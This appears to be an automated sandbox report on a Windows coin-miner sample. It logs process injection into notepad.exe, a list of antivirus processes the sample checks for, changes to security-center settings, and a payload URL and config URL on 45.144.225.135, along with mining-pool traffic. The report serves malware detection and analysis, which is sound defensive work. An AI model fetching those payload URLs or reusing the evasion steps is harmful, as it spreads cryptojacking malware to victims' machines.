                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\P7Oa6i5muL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                        Source: P7Oa6i5muL.exeBinary or memory string: bdagent.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: cmdagent.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: vsserv.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: cfp.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: avp.exe
                        Source: svchost.exe, 00000016.00000002.461861426.000001D596641000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: a2start.exe
                        Source: svchost.exe, 00000016.00000002.461728537.000001D596613000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: a2guard.exe
                        Source: P7Oa6i5muL.exeBinary or memory string: a2service.exe
                        Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                        Mitre Att&ck Matrix

                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Valid Accounts | Windows Management Instrumentation1 | Startup Items1 | Startup Items1 | Disable or Modify Tools11 | Input Capture1 | System Information Discovery23 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                        Default Accounts | Scripting11 | DLL Side-Loading1 | DLL Side-Loading1 | Deobfuscate/Decode Files or Information1 | LSASS Memory | Security Software Discovery251 | Remote Desktop Protocol | Input Capture1 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | Native API1 | Registry Run Keys / Startup Folder2 | Process Injection622 | Scripting11 | Security Account Manager | Virtualization/Sandbox Evasion41 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder2 | Obfuscated Files or Information2 | NTDS | Process Discovery3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap | | Carrier Billing Fraud
                        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing21 | LSA Secrets | Application Window Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol2 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Timestomp1 | Cached Domain Credentials | Remote System Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                        External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Masquerading21 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion41 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
                        Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection622 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

                        Behavior Graph

                        Behavior Graph ID: 448402  Sample: P7Oa6i5muL  Startdate: 14/07/2021  Architecture: WINDOWS  Score: 100

                        Graph nodes and edges, flattened to text:
                        Start
                          DNS/IP: xmr-us-east1.nanopool.org
                          Signatures: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 8 other signatures
                          Started: P7Oa6i5muL.exe (5); svchost.exe; svchost.exe (9 1); 10 other processes
                        P7Oa6i5muL.exe (5)
                          Dropped: C:\Users\user\AppData\...\P7Oa6i5muL.exe, PE32; C:\Users\...\P7Oa6i5muL.exe:Zone.Identifier, ASCII; C:\Users\user\AppData\...\P7Oa6i5muL.exe.log, ASCII
                          Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                          Started: P7Oa6i5muL.exe (6)
                        svchost.exe
                          Signatures: Changes security center settings (notifications, updates, antivirus, firewall)
                          Started: MpCmdRun.exe (1), which started conhost.exe
                        svchost.exe (9 1)
                          DNS/IP: 127.0.0.1 unknown unknown; 192.168.2.1 unknown unknown
                        P7Oa6i5muL.exe (6)
                          DNS/IP: 45.144.225.135, 49719, 80 DEDIPATH-LLCUS Netherlands
                          Dropped: C:\ProgramData\LKBNMTFJgl\csrss, PE32; C:\ProgramData\LKBNMTFJgl\r.vbs, data
                          Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (creates a PE file in dynamic memory); Writes to foreign memory regions; 4 other signatures
                          Started: notepad.exe; cmd.exe (1)
                          Injected: jwMZjhPggeDR.exe
                        notepad.exe
                          DNS/IP: 144.217.14.139, 14444, 49721 OVHFR Canada (signature: Detected Stratum mining protocol); xmr-us-east1.nanopool.org
                          Signatures: System process connects to network (likely due to code injection or exploit)
                        cmd.exe (1)
                          Started: wscript.exe (1); conhost.exe
                        wscript.exe (1)
                          Dropped: C:\Users\user\AppData\...\viTRMUuKeV.url, MS


                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        Source | Detection | Scanner | Label
                        P7Oa6i5muL.exe | 20% | Virustotal |
                        P7Oa6i5muL.exe | 21% | ReversingLabs | Win32.Coinminer.BitCoinMiner

                        Dropped Files

                        Source | Detection | Scanner | Label
                        C:\ProgramData\LKBNMTFJgl\csrss | 21% | ReversingLabs | Win32.Coinminer.BitCoinMiner
                        C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | 21% | ReversingLabs | Win32.Coinminer.BitCoinMiner

                        Unpacked PE Files

                        Source | Detection | Scanner | Label
                        6.2.jwMZjhPggeDR.exe.35d0000.1.unpack | 100% | Avira | TR/ATRAPS.Gen
                        6.0.jwMZjhPggeDR.exe.35d0000.3.unpack | 100% | Avira | TR/ATRAPS.Gen
                        5.2.P7Oa6i5muL.exe.4f3c38.1.unpack | 100% | Avira | HEUR/AGEN.1127349
                        5.2.P7Oa6i5muL.exe.3320000.3.unpack | 100% | Avira | TR/Dropper.Gen
                        6.0.jwMZjhPggeDR.exe.35d0000.1.unpack | 100% | Avira | TR/ATRAPS.Gen
                        5.2.P7Oa6i5muL.exe.400000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                        6.0.jwMZjhPggeDR.exe.35d0000.5.unpack | 100% | Avira | TR/ATRAPS.Gen

                        Domains

                        No Antivirus matches

                        URLs

                        Source | Detection | Scanner | Label
                        http://45.144.225.135/notepad.exe | 14% | Virustotal |
                        http://45.144.225.135/notepad.exe | 100% | Avira URL Cloud | malware
                        http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                        http://www.tiro.com | 0% | URL Reputation | safe
                        http://www.goodfont.co.kr | 0% | URL Reputation | safe
                        http://45.144.225.135/config.txtll | 0% | Avira URL Cloud | safe
                        http://www.sajatypeworks.com | 0% | URL Reputation | safe
                        http://www.typography.netD | 0% | URL Reputation | safe
                        http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                        http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                        http://fontfabrik.com | 0% | URL Reputation | safe
                        http://45.144.225.135/config.txte=C: | 0% | Avira URL Cloud | safe
                        http://45.144.225.135/config.txtx | 0% | Avira URL Cloud | safe
                        http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                        http://www.sandoll.co.kr | 0% | URL Reputation | safe
                        http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                        http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                        http://www.sakkal.com | 0% | URL Reputation | safe
                        http://45.144.225.135/config.txt | 0% | Avira URL Cloud | safe
                        https://www.tiktok.com/legal/report/feedback | 0% | Avira URL Cloud | safe
                        https://activity.windows.comt | 0% | Avira URL Cloud | safe
                        https://%s.xboxlive.com | 0% | URL Reputation | safe
                        http://www.carterandcone.coml | 0% | URL Reputation | safe
                        http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                        https://dynamic.t | 0% | URL Reputation | safe
                        http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
                        http://45.144.225.135/config.txtL | 0% | Avira URL Cloud | safe
                        https://RtlGetVersionntdll.dll | 0% | Avira URL Cloud | safe
                        https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe

                        Domains and IPs

                        Contacted Domains

                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        xmr-us-east1.nanopool.org | 142.44.242.100 | true | false | | high

                          Contacted URLs

                          Name | Malicious | Antivirus Detection | Reputation
                          http://45.144.225.135/config.txt | false | Avira URL Cloud: safe | unknown

                          URLs from Memory and Binaries

                          Name | Source | Malicious | Antivirus Detection | Reputation
                          http://www.fontbureau.com/designersG | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | | high
                          http://www.fontbureau.com/designers/? | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | | high
                          https://t0.tiles.ditu.live.com/tiles/gen19 | svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmp | false | | high
                          http://45.144.225.135/notepad.exe | P7Oa6i5muL.exe | true | 14%, Virustotal; Avira URL Cloud: malware | unknown
                          http://www.founder.com.cn/cn/bThe | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp | false | | high
                          https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | false | | high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp | false | | high
                          http://www.fontbureau.com/designers? | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | | high
                          https://corp.roblox.com/contact/ | svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp | false | | high
                          http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1 | svchost.exe, 00000019.00000003.332934004.0000024726986000.00000004.00000001.sdmp | false | | high
                          https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | false | | high
                          http://www.tiro.com | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.fontbureau.com/designers | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | | high
                          http://www.goodfont.co.kr | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmp | false | | high
                          https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | false | | high
                          http://45.144.225.135/config.txtll | P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                          http://www.sajatypeworks.com | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmp | false | | high
                          http://www.typography.netD | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmp | false | | high
                          http://www.founder.com.cn/cn/cThe | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.g5e.com/G5_End_User_License_Supplemental_Terms | svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmp | false | | high
                          http://www.galapagosdesign.com/staff/dennis.htm | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://fontfabrik.com | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmp | false | | high
                          http://schemas.xmlsoap.org/ws/2004/09/enumeration | svchost.exe, 0000000B.00000002.462497537.00000238030B1000.00000004.00000001.sdmp | false | | high
                          http://45.144.225.135/config.txte=C: | P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                          http://45.144.225.135/config.txtx | P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                          http://www.galapagosdesign.com/DPlease | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.fonts.com | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | | high
                          http://www.sandoll.co.kr | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          https://appexmapsappupdate.blob.core.windows.net | svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | false | | high
                          https://en.help.roblox.com/hc/en-us | svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp | false | | high
                          http://www.urwpp.deDPlease | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.zhongyicts.com.cn | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.sakkal.com | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                          http://www.bingmapsportal.com | svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmp | false | | high
                          https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp | false | | high
                          https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmp | false | | high
                          http://www.apache.org/licenses/LICENSE-2.0 | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | | high
                          http://www.fontbureau.com | P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmp | false | | high
                          https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure | svchost.exe, 00000019.00000003.325656679.00000247269AC000.00000004.00000001.sdmp | false | | high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000014.00000003.309381018.0000019DF3E45000.00000004.00000001.sdmp | false | | high
                          https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp | false | | high
                          https://dev.virtualearth.net/REST/v1/Traffic/Incidents/ | svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmp | false | | high
                          https://www.roblox.com/develop | svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp | false | | high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmp | false | | high
                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000014.00000003.309391302.0000019DF3E40000.00000004.00000001.sdmp | false | | high
                          https://www.tiktok.com/legal/report/feedback | svchost.exe, 00000019.00000003.326466123.000002472699D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.326515844.000002472694D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                          https://corp.roblox.com/parents/ | svchost.exe, 00000019.00000003.332897282.0000024726963000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332747633.000002472698E000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.332934004.0000024726986000.00000004.00000001.sdmp | false | | high
                                                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000014.00000002.309808721.0000019DF3E3D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.309753491.0000019DF3E13000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://activity.windows.comtsvchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://%s.xboxlive.comsvchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                low
                                                                                                https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000014.00000003.309363427.0000019DF3E47000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://www.carterandcone.comlP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000014.00000002.309851133.0000019DF3E5C000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.founder.com.cn/cnP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.svchost.exe, 0000000B.00000002.469172157.00000238089C0000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://www.fontbureau.com/designers/frere-jones.htmlP7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000014.00000003.287575013.0000019DF3E31000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://dynamic.tsvchost.exe, 00000014.00000003.309363427.0000019DF3E47000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.309381018.0000019DF3E45000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.309307335.0000019DF3E5A000.00000004.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000014.00000003.309277263.0000019DF3E60000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.jiyu-kobo.co.jp/P7Oa6i5muL.exe, 00000000.00000002.229315994.0000000005D50000.00000002.00000001.sdmpfalse
